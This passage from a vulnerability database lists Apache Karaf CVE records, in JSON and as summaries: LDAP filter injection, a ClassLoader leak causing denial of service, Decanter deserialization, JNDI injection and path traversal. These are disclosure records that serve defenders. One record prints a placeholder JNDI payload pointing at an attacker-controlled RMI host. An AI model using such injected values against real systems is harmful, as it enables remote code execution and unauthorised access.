                "other": {
                  "content": {
                    "id": "CVE-2026-90979",
                    "options": [
                      {
                        "Exploitation": "none"
                      },
                      {
                        "Automatable": "yes"
                      },
                      {
                        "Technical Impact": "partial"
                      }
                    ],
                    "role": "CISA Coordinator",
                    "timestamp": "2026-09-30T19:53:53.546419Z",
                    "version": "2.0.3"
                  },
                  "type": "ssvc"
                }
              }
            ],
            "providerMetadata": {
              "dateUpdated": "2026-09-30T19:53:57.685Z",
              "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
              "shortName": "CISA-ADP"
            },
            "title": "CISA ADP Vulnrichment"
          }
        ],
        "cna": {
          "affected": [
            {
              "defaultStatus": "unaffected",
              "packageName": "org.apache.karaf.jaas.modules.ldap",
              "product": "Apache Karaf",
              "vendor": "Apache Software Foundation",
              "versions": [
                {
                  "lessThan": "4.4.12",
                  "status": "affected",
                  "version": "0",
                  "versionType": "semver"
                }
              ]
            }
          ],
          "credits": [
            {
              "lang": "en",
              "type": "reporter",
              "value": "Gjoko Krstic \u003cgjoko@zeroscience.mk\u003e"
            }
          ],
          "descriptions": [
            {
              "lang": "en",
              "supportingMedia": [
                {
                  "base64": false,
                  "type": "text/html",
                  "value": "\u003cp\u003e\u003cspan\u003eLDAPCache\u003c/span\u003e\u0026nbsp;and\u0026nbsp;\u003ccode\u003eLDAPBackingEngine\u003c/code\u003e\u0026nbsp;build LDAP search filters for user lookup and role lookup by textually substituting the placeholders\u0026nbsp;\u003ccode\u003e%u\u003c/code\u003e,\u0026nbsp;\u003ccode\u003e%dn\u003c/code\u003e, and\u0026nbsp;\u003ccode\u003e%fqdn\u003c/code\u003e\u0026nbsp;(drawn from the login name, the resolved user DN, and its fully qualified namespace form) into administrator-configured filter templates (\u003ccode\u003euserFilter\u003c/code\u003e,\u0026nbsp;\u003ccode\u003eroleFilter\u003c/code\u003e). Before the fix, the only sanitization applied to the substituted value was double backslashed:\u003c/p\u003e\u003cdiv\u003e\u003ccode\u003efilter = filter.replaceAll(Pattern.quote(\"%u\"), Matcher.quoteReplacement(user));\u003c/code\u003e\u003c/div\u003e\u003cdiv\u003e\u003ccode\u003efilter = filter.replace(\"\\\\\", \"\\\\\\\\\");\u003c/code\u003e\u003c/div\u003e\u003cdiv\u003e\u003cbr\u003e\u003c/div\u003e\u003cdiv\u003eThis does not escape the other characters RFC 4515 requires escaping in an LDAP search filter:\u0026nbsp;\u003ccode\u003e*\u003c/code\u003e,\u0026nbsp;\u003ccode\u003e(\u003c/code\u003e,\u0026nbsp;\u003ccode\u003e)\u003c/code\u003e, and\u0026nbsp;\u003ccode\u003eNUL\u003c/code\u003e. A login name containing any of these can change the structure of the resulting filter rather than being matched as a literal value (e.g. a crafted username can turn an equality match into a wildcard match, or close/reopen filter clauses), widening what the search returns and potentially causing a login or role lookup to match an LDAP entry other than the intended one, over-granting roles, and depending on deployment-specific filter templates, potentially affecting which account a login resolved to.\u003c/div\u003e\u003cdiv\u003e\u003cbr\u003e\u003c/div\u003e\u003cdiv\u003eIt\u0027s not exploitable through every entry points:\u0026nbsp;\u003ccode\u003eLDAPLoginModule\u003c/code\u003e\u0026nbsp;and\u0026nbsp;\u003ccode\u003eLDAPPubkeyLoginModule\u003c/code\u003e\u0026nbsp;both called\u0026nbsp;\u003ccode\u003eUtil.doRFC2254Encoding()\u003c/code\u003e\u0026nbsp;(correct RFC 4515 escaping) on the login name before handing it to\u0026nbsp;\u003ccode\u003eLDAPCache\u003c/code\u003e, which masked the missing escaping in\u0026nbsp;\u003ccode\u003eLDAPCache\u003c/code\u003e\u0026nbsp;for those two call paths. Using\u0026nbsp;\u003ccode\u003eLDAPCache\u003c/code\u003e\u0026nbsp;directly (bypassing the login modules) does not reproduce through the normal\u0026nbsp;\u003ccode\u003eLDAPLoginModule\u003c/code\u003e/\u003ccode\u003eLDAPPubkeyLoginModule\u003c/code\u003e\u0026nbsp;authentication flow for this reason. It does reproduce through two other call paths that reach\u0026nbsp;\u003ccode\u003eLDAPCache\u003c/code\u003e/\u003ccode\u003eLDAPBackingEngine\u003c/code\u003e\u0026nbsp;without any prior escaping:\u003c/div\u003e\u003cdiv\u003e\u003cul\u003e\u003cli\u003e\u003ccode\u003eGSSAPILdapLoginModule\u003c/code\u003e\u0026nbsp;passes the\u0026nbsp;\u003ccode\u003eNameCallback\u003c/code\u003e\u0026nbsp;name straight through, unescaped.\u003c/li\u003e\u003cli\u003e\u003ccode\u003eLDAPBackingEngine\u003c/code\u003e\u0026nbsp;(\u003ccode\u003elistRoles\u003c/code\u003e) passes\u0026nbsp;\u003ccode\u003eprincipal.getName()\u003c/code\u003e\u0026nbsp;straight through, unescaped.\u003c/li\u003e\u003c/ul\u003e\u003cdiv\u003e\u003cbr\u003e\u003c/div\u003e\u003c/div\u003e"
                }
              ],
              "value": "LDAPCache\u00a0and\u00a0LDAPBackingEngine\u00a0build LDAP search filters for user lookup and role lookup by textually substituting the placeholders\u00a0%u,\u00a0%dn, and\u00a0%fqdn\u00a0(drawn from the login name, the resolved user DN, and its fully qualified namespace form) into administrator-configured filter templates (userFilter,\u00a0roleFilter). Before the fix, the only sanitization applied to the substituted value was double backslashed:\n\nfilter = filter.replaceAll(Pattern.quote(\"%u\"), Matcher.quoteReplacement(user));\n\nfilter = filter.replace(\"\\\\\", \"\\\\\\\\\");\n\n\n\n\nThis does not escape the other characters RFC 4515 requires escaping in an LDAP search filter:\u00a0*,\u00a0(,\u00a0), and\u00a0NUL. A login name containing any of these can change the structure of the resulting filter rather than being matched as a literal value (e.g. a crafted username can turn an equality match into a wildcard match, or close/reopen filter clauses), widening what the search returns and potentially causing a login or role lookup to match an LDAP entry other than the intended one, over-granting roles, and depending on deployment-specific filter templates, potentially affecting which account a login resolved to.\n\n\n\n\nIt\u0027s not exploitable through every entry points:\u00a0LDAPLoginModule\u00a0and\u00a0LDAPPubkeyLoginModule\u00a0both called\u00a0Util.doRFC2254Encoding()\u00a0(correct RFC 4515 escaping) on the login name before handing it to\u00a0LDAPCache, which masked the missing escaping in\u00a0LDAPCache\u00a0for those two call paths. Using\u00a0LDAPCache\u00a0directly (bypassing the login modules) does not reproduce through the normal\u00a0LDAPLoginModule/LDAPPubkeyLoginModule\u00a0authentication flow for this reason. It does reproduce through two other call paths that reach\u00a0LDAPCache/LDAPBackingEngine\u00a0without any prior escaping:\n\n  *  GSSAPILdapLoginModule\u00a0passes the\u00a0NameCallback\u00a0name straight through, unescaped.\n  *  LDAPBackingEngine\u00a0(listRoles) passes\u00a0principal.getName()\u00a0straight through, unescaped."
            }
          ],
          "metrics": [
            {
              "other": {
                "content": {
                  "text": "moderate"
                },
                "type": "Textual description of severity"
              },
              "scenarios": [
                {
                  "lang": "en",
                  "value": "GENERAL"
                }
              ]
            }
          ],
          "problemTypes": [
            {
              "descriptions": [
                {
                  "cweId": "CWE-90",
                  "description": "CWE-90 Improper neutralization of special elements used in an LDAP query (\u0027LDAP injection\u0027)",
                  "lang": "en",
                  "type": "CWE"
                }
              ]
            }
          ],
          "providerMetadata": {
            "dateUpdated": "2026-09-28T09:34:33.253Z",
            "orgId": "f0158376-9dc2-43b6-827c-5f631a4d8d09",
            "shortName": "apache"
          },
          "references": [
            {
              "tags": [
                "vendor-advisory"
              ],
              "url": "https://karaf.apache.org/security/cve-2026-90979.txt"
            }
          ],
          "source": {
            "advisory": "https://karaf.apache.org/security/cve-2026-90979.txt",
            "defect": [
              "https://github.com/apache/karaf/pull/2880"
            ],
            "discovery": "EXTERNAL"
          },
          "title": "Apache Karaf: LDAP filter injection in JAAS LDAP login modules",
          "x_generator": {
            "engine": "Vulnogram 1.0.3"
          }
        }
      },
      "cveMetadata": {
        "assignerOrgId": "f0158376-9dc2-43b6-827c-5f631a4d8d09",
        "assignerShortName": "apache",
        "cveId": "CVE-2026-90979",
        "datePublished": "2026-09-28T09:34:33.253Z",
        "dateReserved": "2026-09-14T13:42:44.229Z",
        "dateUpdated": "2026-09-30T19:53:57.685Z",
        "state": "PUBLISHED"
      },
      "dataType": "CVE_RECORD",
      "dataVersion": "5.2"
    }

    CVE-2026-92230 (GCVE-0-2026-92230)

    Vulnerability from cvelistv5 – Published: 2026-09-17 18:38 – Updated: 2026-09-18 13:33
    VLAI
    Title
    Apache Karaf: Improper release of ClassLoader references via static ThreadLocal caching
    Summary
    Apache Karaf's XmlUtils cached XML parser/transformer factories in static ThreadLocal fields on long-lived container threads. Because a ThreadLocal value outlives the OSGi bundle that created it, repeated bundle or feature install, update, or refresh operations can leave successive bundle ClassLoader's pinned in memory and unreachable for garbage collection, leading to unbounded Metaspace growth and eventual denial of service of the Karaf instance.
    SSVC
    Exploitation: none Automatable: yes Technical Impact: partial
    CISA Coordinator · CISA-ADP (v2.0.3)
    Decision recorded 2026-09-18 13:32 UTC
    CWE
    • CWE-401 - Missing release of memory after effective lifetime
    • CWE-772 - Missing release of resource after effective lifetime
    Impacted products
    Vendor Product Version
    Apache Software Foundation Apache Karaf Affected: 0 , < 4.4.11 (semver)
    Create a notification for this product.
    Show details on NVD website

    {
      "containers": {
        "adp": [
          {
            "providerMetadata": {
              "dateUpdated": "2026-09-17T19:11:48.291Z",
              "orgId": "af854a3a-2127-422b-91ae-364da2661108",
              "shortName": "CVE"
            },
            "references": [
              {
                "url": "http://www.openwall.com/lists/oss-security/2026/09/17/3"
              }
            ],
            "title": "CVE Program Container"
          },
          {
            "metrics": [
              {
                "cvssV3_1": {
                  "attackComplexity": "LOW",
                  "attackVector": "NETWORK",
                  "availabilityImpact": "HIGH",
                  "baseScore": 7.5,
                  "baseSeverity": "HIGH",
                  "confidentialityImpact": "NONE",
                  "integrityImpact": "NONE",
                  "privilegesRequired": "NONE",
                  "scope": "UNCHANGED",
                  "userInteraction": "NONE",
                  "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
                  "version": "3.1"
                }
              },
              {
                "other": {
                  "content": {
                    "id": "CVE-2026-92230",
                    "options": [
                      {
                        "Exploitation": "none"
                      },
                      {
                        "Automatable": "yes"
                      },
                      {
                        "Technical Impact": "partial"
                      }
                    ],
                    "role": "CISA Coordinator",
                    "timestamp": "2026-09-18T13:32:59.478507Z",
                    "version": "2.0.3"
                  },
                  "type": "ssvc"
                }
              }
            ],
            "providerMetadata": {
              "dateUpdated": "2026-09-18T13:33:04.842Z",
              "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
              "shortName": "CISA-ADP"
            },
            "title": "CISA ADP Vulnrichment"
          }
        ],
        "cna": {
          "affected": [
            {
              "defaultStatus": "unaffected",
              "product": "Apache Karaf",
              "vendor": "Apache Software Foundation",
              "versions": [
                {
                  "lessThan": "4.4.11",
                  "status": "affected",
                  "version": "0",
                  "versionType": "semver"
                }
              ]
            }
          ],
          "credits": [
            {
              "lang": "en",
              "type": "reporter",
              "value": "Baoquan Cui \u0026 Yucheng Qiu"
            }
          ],
          "descriptions": [
            {
              "lang": "en",
              "supportingMedia": [
                {
                  "base64": false,
                  "type": "text/html",
                  "value": "Apache Karaf\u0027s XmlUtils cached XML parser/transformer factories in static ThreadLocal fields on long-lived container threads. Because a ThreadLocal value outlives the OSGi bundle that created it, repeated bundle or feature install, update, or refresh operations can leave successive bundle ClassLoader\u0027s pinned in memory and unreachable for garbage collection, leading to unbounded Metaspace growth and eventual denial of service of the Karaf instance."
                }
              ],
              "value": "Apache Karaf\u0027s XmlUtils cached XML parser/transformer factories in static ThreadLocal fields on long-lived container threads. Because a ThreadLocal value outlives the OSGi bundle that created it, repeated bundle or feature install, update, or refresh operations can leave successive bundle ClassLoader\u0027s pinned in memory and unreachable for garbage collection, leading to unbounded Metaspace growth and eventual denial of service of the Karaf instance."
            }
          ],
          "metrics": [
            {
              "other": {
                "content": {
                  "text": "moderate"
                },
                "type": "Textual description of severity"
              },
              "scenarios": [
                {
                  "lang": "en",
                  "value": "GENERAL"
                }
              ]
            }
          ],
          "problemTypes": [
            {
              "descriptions": [
                {
                  "cweId": "CWE-401",
                  "description": "CWE-401 Missing release of memory after effective lifetime",
                  "lang": "en",
                  "type": "CWE"
                }
              ]
            },
            {
              "descriptions": [
                {
                  "cweId": "CWE-772",
                  "description": "CWE-772 Missing release of resource after effective lifetime",
                  "lang": "en",
                  "type": "CWE"
                }
              ]
            }
          ],
          "providerMetadata": {
            "dateUpdated": "2026-09-17T18:38:29.556Z",
            "orgId": "f0158376-9dc2-43b6-827c-5f631a4d8d09",
            "shortName": "apache"
          },
          "references": [
            {
              "tags": [
                "vendor-advisory"
              ],
              "url": "https://lists.apache.org/thread/pxgqjvsmzgpvgly1qf1w300qxsp8bxdj"
            }
          ],
          "source": {
            "advisory": "https://karaf.apache.org/security/cve-2026-92230.txt",
            "defect": [
              "https://github.com/apache/karaf/issues/2278"
            ],
            "discovery": "EXTERNAL"
          },
          "title": "Apache Karaf: Improper release of ClassLoader references via static ThreadLocal caching",
          "x_generator": {
            "engine": "Vulnogram 1.0.3"
          }
        }
      },
      "cveMetadata": {
        "assignerOrgId": "f0158376-9dc2-43b6-827c-5f631a4d8d09",
        "assignerShortName": "apache",
        "cveId": "CVE-2026-92230",
        "datePublished": "2026-09-17T18:38:29.556Z",
        "dateReserved": "2026-09-15T19:05:23.880Z",
        "dateUpdated": "2026-09-18T13:33:04.842Z",
        "state": "PUBLISHED"
      },
      "dataType": "CVE_RECORD",
      "dataVersion": "5.2"
    }

    CVE-2026-24656 (GCVE-0-2026-24656)

    Vulnerability from cvelistv5 – Published: 2026-01-26 09:41 – Updated: 2026-01-26 18:35
    VLAI
    Title
    Apache Karaf: Decanter log-socket collector has deserialization vulnerability
    Summary
    Deserialization of Untrusted Data vulnerability in Apache Karaf Decanter. The Decanter log socket collector exposes the port 4560, without authentication. If the collector exposes allowed classes property, this configuration can be bypassed. It means that the log socket collector is vulnerable to deserialization of untrusted data, eventually causing DoS. NB: Decanter log socket collector is not installed by default. Users who have not installed Decanter log socket are not impacted by this issue. This issue affects Apache Karaf Decanter before 2.12.0. Users are recommended to upgrade to version 2.12.0, which fixes the issue.
    SSVC
    Exploitation: none Automatable: no Technical Impact: partial
    CISA Coordinator · CISA-ADP (v2.0.3)
    Decision recorded 2026-01-26 18:35 UTC
    CWE
    • CWE-502 - Deserialization of Untrusted Data
    Impacted products
    Vendor Product Version
    Apache Software Foundation Apache Karaf Affected: 0 , < 2.12.0 (semver)
    Unaffected: 2.12.0 (semver)
    Create a notification for this product.
    Credits
    Show details on NVD website

    {
      "containers": {
        "adp": [
          {
            "providerMetadata": {
              "dateUpdated": "2026-01-26T10:09:04.018Z",
              "orgId": "af854a3a-2127-422b-91ae-364da2661108",
              "shortName": "CVE"
            },
            "references": [
              {
                "url": "http://www.openwall.com/lists/oss-security/2026/01/24/1"
              }
            ],
            "title": "CVE Program Container"
          },
          {
            "metrics": [
              {
                "cvssV3_1": {
                  "attackComplexity": "HIGH",
                  "attackVector": "NETWORK",
                  "availabilityImpact": "LOW",
                  "baseScore": 3.7,
                  "baseSeverity": "LOW",
                  "confidentialityImpact": "NONE",
                  "integrityImpact": "NONE",
                  "privilegesRequired": "NONE",
                  "scope": "UNCHANGED",
                  "userInteraction": "NONE",
                  "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L",
                  "version": "3.1"
                }
              },
              {
                "other": {
                  "content": {
                    "id": "CVE-2026-24656",
                    "options": [
                      {
                        "Exploitation": "none"
                      },
                      {
                        "Automatable": "no"
                      },
                      {
                        "Technical Impact": "partial"
                      }
                    ],
                    "role": "CISA Coordinator",
                    "timestamp": "2026-01-26T18:35:47.421252Z",
                    "version": "2.0.3"
                  },
                  "type": "ssvc"
                }
              }
            ],
            "providerMetadata": {
              "dateUpdated": "2026-01-26T18:35:51.514Z",
              "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
              "shortName": "CISA-ADP"
            },
            "title": "CISA ADP Vulnrichment"
          }
        ],
        "cna": {
          "affected": [
            {
              "collectionURL": "https://repo.maven.apache.org/maven2",
              "defaultStatus": "unaffected",
              "packageName": "org.apache.karaf.decanter.collector:org.apache.karaf.decanter.collector.log.socket",
              "product": "Apache Karaf",
              "vendor": "Apache Software Foundation",
              "versions": [
                {
                  "lessThan": "2.12.0",
                  "status": "affected",
                  "version": "0",
                  "versionType": "semver"
                },
                {
                  "status": "unaffected",
                  "version": "2.12.0",
                  "versionType": "semver"
                }
              ]
            }
          ],
          "credits": [
            {
              "lang": "en",
              "type": "finder",
              "value": "r00t4dm"
            }
          ],
          "descriptions": [
            {
              "lang": "en",
              "supportingMedia": [
                {
                  "base64": false,
                  "type": "text/html",
                  "value": "\u003cp\u003eDeserialization of Untrusted Data vulnerability in Apache Karaf Decanter.\u003c/p\u003e\u003cbr\u003eThe Decanter log socket collector exposes the port 4560, without authentication. If the collector exposes allowed classes property, this configuration can be bypassed.\u003cbr\u003eIt means that the log socket collector is vulnerable to deserialization of untrusted data, eventually causing DoS.\u003cbr\u003e\u003cbr\u003e\u003cbr\u003eNB: Decanter log socket collector is not installed by default. Users who have not installed Decanter log socket are not impacted by this issue.\u003cbr\u003e\u003cbr\u003e\u003cp\u003eThis issue affects Apache Karaf Decanter before 2.12.0.\u003c/p\u003e\u003cp\u003eUsers are recommended to upgrade to version 2.12.0, which fixes the issue.\u003c/p\u003e"
                }
              ],
              "value": "Deserialization of Untrusted Data vulnerability in Apache Karaf Decanter.\n\n\nThe Decanter log socket collector exposes the port 4560, without authentication. If the collector exposes allowed classes property, this configuration can be bypassed.\nIt means that the log socket collector is vulnerable to deserialization of untrusted data, eventually causing DoS.\n\n\nNB: Decanter log socket collector is not installed by default. Users who have not installed Decanter log socket are not impacted by this issue.\n\nThis issue affects Apache Karaf Decanter before 2.12.0.\n\nUsers are recommended to upgrade to version 2.12.0, which fixes the issue."
            }
          ],
          "metrics": [
            {
              "other": {
                "content": {
                  "text": "important"
                },
                "type": "Textual description of severity"
              }
            }
          ],
          "problemTypes": [
            {
              "descriptions": [
                {
                  "cweId": "CWE-502",
                  "description": "CWE-502 Deserialization of Untrusted Data",
                  "lang": "en",
                  "type": "CWE"
                }
              ]
            }
          ],
          "providerMetadata": {
            "dateUpdated": "2026-01-26T09:41:24.356Z",
            "orgId": "f0158376-9dc2-43b6-827c-5f631a4d8d09",
            "shortName": "apache"
          },
          "references": [
            {
              "tags": [
                "vendor-advisory"
              ],
              "url": "https://lists.apache.org/thread/dc5wmdn6hyc992olntkl75kk04ndzx34"
            }
          ],
          "source": {
            "advisory": "https://karaf.apache.org/security/cve-2026-24656.txt",
            "defect": [
              "https://github.com/apache/karaf-decanter/issues/555"
            ],
            "discovery": "EXTERNAL"
          },
          "title": "Apache Karaf: Decanter log-socket collector has deserialization vulnerability",
          "x_generator": {
            "engine": "Vulnogram 0.2.0"
          }
        }
      },
      "cveMetadata": {
        "assignerOrgId": "f0158376-9dc2-43b6-827c-5f631a4d8d09",
        "assignerShortName": "apache",
        "cveId": "CVE-2026-24656",
        "datePublished": "2026-01-26T09:41:24.356Z",
        "dateReserved": "2026-01-23T17:55:14.286Z",
        "dateUpdated": "2026-01-26T18:35:51.514Z",
        "state": "PUBLISHED"
      },
      "dataType": "CVE_RECORD",
      "dataVersion": "5.2"
    }

    CVE-2022-40145 (GCVE-0-2022-40145)

    Vulnerability from cvelistv5 – Published: 2022-12-21 15:23 – Updated: 2025-04-15 18:03
    VLAI
    Title
    Apache Karaf: JDBC JAAS LDAP injection
    Summary
    This vulnerable is about a potential code injection when an attacker has control of the target LDAP server using in the JDBC JNDI URL. The function jaas.modules.src.main.java.porg.apache.karaf.jass.modules.jdbc.JDBCUtils#doCreateDatasource use InitialContext.lookup(jndiName) without filtering. An user can modify `options.put(JDBCUtils.DATASOURCE, "osgi:" + DataSource.class.getName());` to `options.put(JDBCUtils.DATASOURCE,"jndi:rmi://x.x.x.x:xxxx/Command");` in JdbcLoginModuleTest#setup. This is vulnerable to a remote code execution (RCE) attack when a configuration uses a JNDI LDAP data source URI when an attacker has control of the target LDAP server.This issue affects all versions of Apache Karaf up to 4.4.1 and 4.3.7. We encourage the users to upgrade to Apache Karaf at least 4.4.2 or 4.3.8
    SSVC
    Exploitation: none Automatable: yes Technical Impact: total
    CISA Coordinator · CISA-ADP (v2.0.3)
    Decision recorded 2025-04-15 18:02 UTC
    CWE
    • CWE-74 - Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection')
    • CWE-20 - Improper Input Validation
    References
    Impacted products
    Vendor Product Version
    Apache Software Foundation Apache Karaf Affected: 4.4.0 , < 4.4.2 (maven)
    Affected: 0 , < 4.3.8 (maven)
    Create a notification for this product.
    Show details on NVD website

    {
      "containers": {
        "adp": [
          {
            "providerMetadata": {
              "dateUpdated": "2024-08-03T12:14:39.957Z",
              "orgId": "af854a3a-2127-422b-91ae-364da2661108",
              "shortName": "CVE"
            },
            "references": [
              {
                "tags": [
                  "vendor-advisory",
                  "x_transferred"
                ],
                "url": "https://karaf.apache.org/security/cve-2022-40145.txt"
              }
            ],
            "title": "CVE Program Container"
          },
          {
            "metrics": [
              {
                "cvssV3_1": {
                  "attackComplexity": "LOW",
                  "attackVector": "NETWORK",
                  "availabilityImpact": "HIGH",
                  "baseScore": 9.8,
                  "baseSeverity": "CRITICAL",
                  "confidentialityImpact": "HIGH",
                  "integrityImpact": "HIGH",
                  "privilegesRequired": "NONE",
                  "scope": "UNCHANGED",
                  "userInteraction": "NONE",
                  "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
                  "version": "3.1"
                }
              },
              {
                "other": {
                  "content": {
                    "id": "CVE-2022-40145",
                    "options": [
                      {
                        "Exploitation": "none"
                      },
                      {
                        "Automatable": "yes"
                      },
                      {
                        "Technical Impact": "total"
                      }
                    ],
                    "role": "CISA Coordinator",
                    "timestamp": "2025-04-15T18:02:30.458673Z",
                    "version": "2.0.3"
                  },
                  "type": "ssvc"
                }
              }
            ],
            "providerMetadata": {
              "dateUpdated": "2025-04-15T18:03:47.618Z",
              "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
              "shortName": "CISA-ADP"
            },
            "title": "CISA ADP Vulnrichment"
          }
        ],
        "cna": {
          "affected": [
            {
              "defaultStatus": "unaffected",
              "product": "Apache Karaf",
              "vendor": "Apache Software Foundation",
              "versions": [
                {
                  "lessThan": "4.4.2",
                  "status": "affected",
                  "version": "4.4.0",
                  "versionType": "maven"
                },
                {
                  "lessThan": "4.3.8",
                  "status": "affected",
                  "version": "0",
                  "versionType": "maven"
                }
              ]
            }
          ],
          "credits": [
            {
              "lang": "en",
              "type": "reporter",
              "value": "Xun Bai \u003cbbbbear68@gmail.com\u003e"
            }
          ],
          "descriptions": [
            {
              "lang": "en",
              "supportingMedia": [
                {
                  "base64": false,
                  "type": "text/html",
                  "value": "\u003cspan style=\"background-color: rgb(255, 255, 255);\"\u003eThis vulnerable is about a potential code injection when an attacker has control of the target LDAP server using in the JDBC JNDI URL.\u003cbr\u003e\u003cbr\u003eThe function jaas.modules.src.main.java.por\u003c/span\u003e\u003cspan style=\"background-color: rgb(255, 255, 255);\"\u003eg.apache.karaf.jass.modules.\u003c/span\u003e\u003cspan style=\"background-color: rgb(255, 255, 255);\"\u003ejdbc.JDBCUtils#doCreateDatasou\u003c/span\u003e\u003cspan style=\"background-color: rgb(255, 255, 255);\"\u003erce\u003c/span\u003e\u003cbr\u003e\u003cspan style=\"background-color: rgb(255, 255, 255);\"\u003euse InitialContext.lookup(jndiName\u003c/span\u003e\u003cspan style=\"background-color: rgb(255, 255, 255);\"\u003e) without filtering.\u003cbr\u003eAn user can modify\u0026nbsp;\u003c/span\u003e\u003cspan style=\"background-color: rgb(255, 255, 255);\"\u003e`options.put(JDBCUtils.DATASOU\u003c/span\u003e\u003cspan style=\"background-color: rgb(255, 255, 255);\"\u003eRCE, \"osgi:\" +\u0026nbsp;\u003c/span\u003e\u003cspan style=\"background-color: rgb(255, 255, 255);\"\u003eDataSource.class.getName());` to `options.put(JDBCUtils.DATASOU\u003c/span\u003e\u003cspan style=\"background-color: rgb(255, 255, 255);\"\u003eRCE,\u003c/span\u003e\u003cspan style=\"background-color: rgb(255, 255, 255);\"\u003e\"jndi:rmi://x.x.x.x:xxxx/Comma\u003c/span\u003e\u003cspan style=\"background-color: rgb(255, 255, 255);\"\u003end\");` in JdbcLoginModuleTest#setup.\u003c/span\u003e\u003cbr\u003e\u003cbr\u003e\u003cspan style=\"background-color: rgb(255, 255, 255);\"\u003eThis is vulnerable to a remote code execution (RCE) attack when a\u003c/span\u003e\u003cbr\u003e\u003cspan style=\"background-color: rgb(255, 255, 255);\"\u003econfiguration uses a JNDI LDAP data source URI when an attacker has\u003c/span\u003e\u003cbr\u003e\u003cspan style=\"background-color: rgb(255, 255, 255);\"\u003econtrol of the target LDAP server.\u003c/span\u003e\u003cp\u003eThis issue affects all versions of Apache Karaf up to 4.4.1 and 4.3.7.\u003c/p\u003eWe encourage the users to upgrade to Apache Karaf at least 4.4.2 or 4.3.8"
                }
              ],
              "value": "This vulnerable is about a potential code injection when an attacker has control of the target LDAP server using in the JDBC JNDI URL.\n\nThe function jaas.modules.src.main.java.porg.apache.karaf.jass.modules.jdbc.JDBCUtils#doCreateDatasource\nuse InitialContext.lookup(jndiName) without filtering.\nAn user can modify\u00a0`options.put(JDBCUtils.DATASOURCE, \"osgi:\" +\u00a0DataSource.class.getName());` to `options.put(JDBCUtils.DATASOURCE,\"jndi:rmi://x.x.x.x:xxxx/Command\");` in JdbcLoginModuleTest#setup.\n\nThis is vulnerable to a remote code execution (RCE) attack when a\nconfiguration uses a JNDI LDAP data source URI when an attacker has\ncontrol of the target LDAP server.This issue affects all versions of Apache Karaf up to 4.4.1 and 4.3.7.\n\nWe encourage the users to upgrade to Apache Karaf at least 4.4.2 or 4.3.8"
            }
          ],
          "metrics": [
            {
              "other": {
                "content": {
                  "text": "low"
                },
                "type": "Textual description of severity"
              }
            }
          ],
          "problemTypes": [
            {
              "descriptions": [
                {
                  "cweId": "CWE-74",
                  "description": "CWE-74 Improper Neutralization of Special Elements in Output Used by a Downstream Component (\u0027Injection\u0027)",
                  "lang": "en",
                  "type": "CWE"
                }
              ]
            },
            {
              "descriptions": [
                {
                  "cweId": "CWE-20",
                  "description": "CWE-20 Improper Input Validation",
                  "lang": "en",
                  "type": "CWE"
                }
              ]
            }
          ],
          "providerMetadata": {
            "dateUpdated": "2022-12-21T15:23:42.847Z",
            "orgId": "f0158376-9dc2-43b6-827c-5f631a4d8d09",
            "shortName": "apache"
          },
          "references": [
            {
              "tags": [
                "vendor-advisory"
              ],
              "url": "https://karaf.apache.org/security/cve-2022-40145.txt"
            }
          ],
          "source": {
            "defect": [
              "KARAF-7568"
            ],
            "discovery": "EXTERNAL"
          },
          "title": "Apache Karaf: JDBC JAAS LDAP injection",
          "x_generator": {
            "engine": "Vulnogram 0.1.0-dev"
          }
        }
      },
      "cveMetadata": {
        "assignerOrgId": "f0158376-9dc2-43b6-827c-5f631a4d8d09",
        "assignerShortName": "apache",
        "cveId": "CVE-2022-40145",
        "datePublished": "2022-12-21T15:23:42.847Z",
        "dateReserved": "2022-09-07T08:02:30.677Z",
        "dateUpdated": "2025-04-15T18:03:47.618Z",
        "state": "PUBLISHED"
      },
      "dataType": "CVE_RECORD",
      "dataVersion": "5.1"
    }

    CVE-2022-22932 (GCVE-0-2022-22932)

    Vulnerability from cvelistv5 – Published: 2022-01-26 11:10 – Updated: 2024-08-03 03:28
    VLAI
    Title
    Path traversal flaws
    Summary
    Apache Karaf obr:* commands and run goal on the karaf-maven-plugin have partial path traversal which allows to break out of expected folder. The risk is low as obr:* commands are not very used and the entry is set by user. This has been fixed in revision: https://gitbox.apache.org/repos/asf?p=karaf.git;h=36a2bc4 https://gitbox.apache.org/repos/asf?p=karaf.git;h=52b70cf Mitigation: Apache Karaf users should upgrade to 4.2.15 or 4.3.6 or later as soon as possible, or use correct path. JIRA Tickets: https://issues.apache.org/jira/browse/KARAF-7326
    Severity
    No CVSS data available.
    CWE
    • Path traversal flaws
    References
    Impacted products
    Vendor Product Version
    Apache Software Foundation Apache Karaf Affected: Apache Karaf , < 4.2.15 (custom)
    Create a notification for this product.
    Show details on NVD website

    {
      "containers": {
        "adp": [
          {
            "providerMetadata": {
              "dateUpdated": "2024-08-03T03:28:42.479Z",
              "orgId": "af854a3a-2127-422b-91ae-364da2661108",
              "shortName": "CVE"
            },
            "references": [
              {
                "tags": [
                  "x_refsource_MISC",
                  "x_transferred"
                ],
                "url": "https://karaf.apache.org/security/cve-2022-22932.txt"
              }
            ],
            "title": "CVE Program Container"
          }
        ],
        "cna": {
          "affected": [
            {
              "product": "Apache Karaf",
              "vendor": "Apache Software Foundation",
              "versions": [
                {
                  "changes": [
                    {
                      "at": "4.3.6",
                      "status": "unaffected"
                    }
                  ],
                  "lessThan": "4.2.15",
                  "status": "affected",
                  "version": "Apache Karaf",
                  "versionType": "custom"
                }
              ]
            }
          ],
          "credits": [
            {
              "lang": "en",
              "value": "This issue was discovered and reported by GHSL team member Jaroslav Lobacevski"
            }
          ],
          "descriptions": [
            {
              "lang": "en",
              "value": "Apache Karaf obr:* commands and run goal on the karaf-maven-plugin have partial path traversal which allows to break out of expected folder. The risk is low as obr:* commands are not very used and the entry is set by user. This has been fixed in revision: https://gitbox.apache.org/repos/asf?p=karaf.git;h=36a2bc4 https://gitbox.apache.org/repos/asf?p=karaf.git;h=52b70cf Mitigation: Apache Karaf users should upgrade to 4.2.15 or 4.3.6 or later as soon as possible, or use correct path. JIRA Tickets: https://issues.apache.org/jira/browse/KARAF-7326"
            }
          ],
          "metrics": [
            {
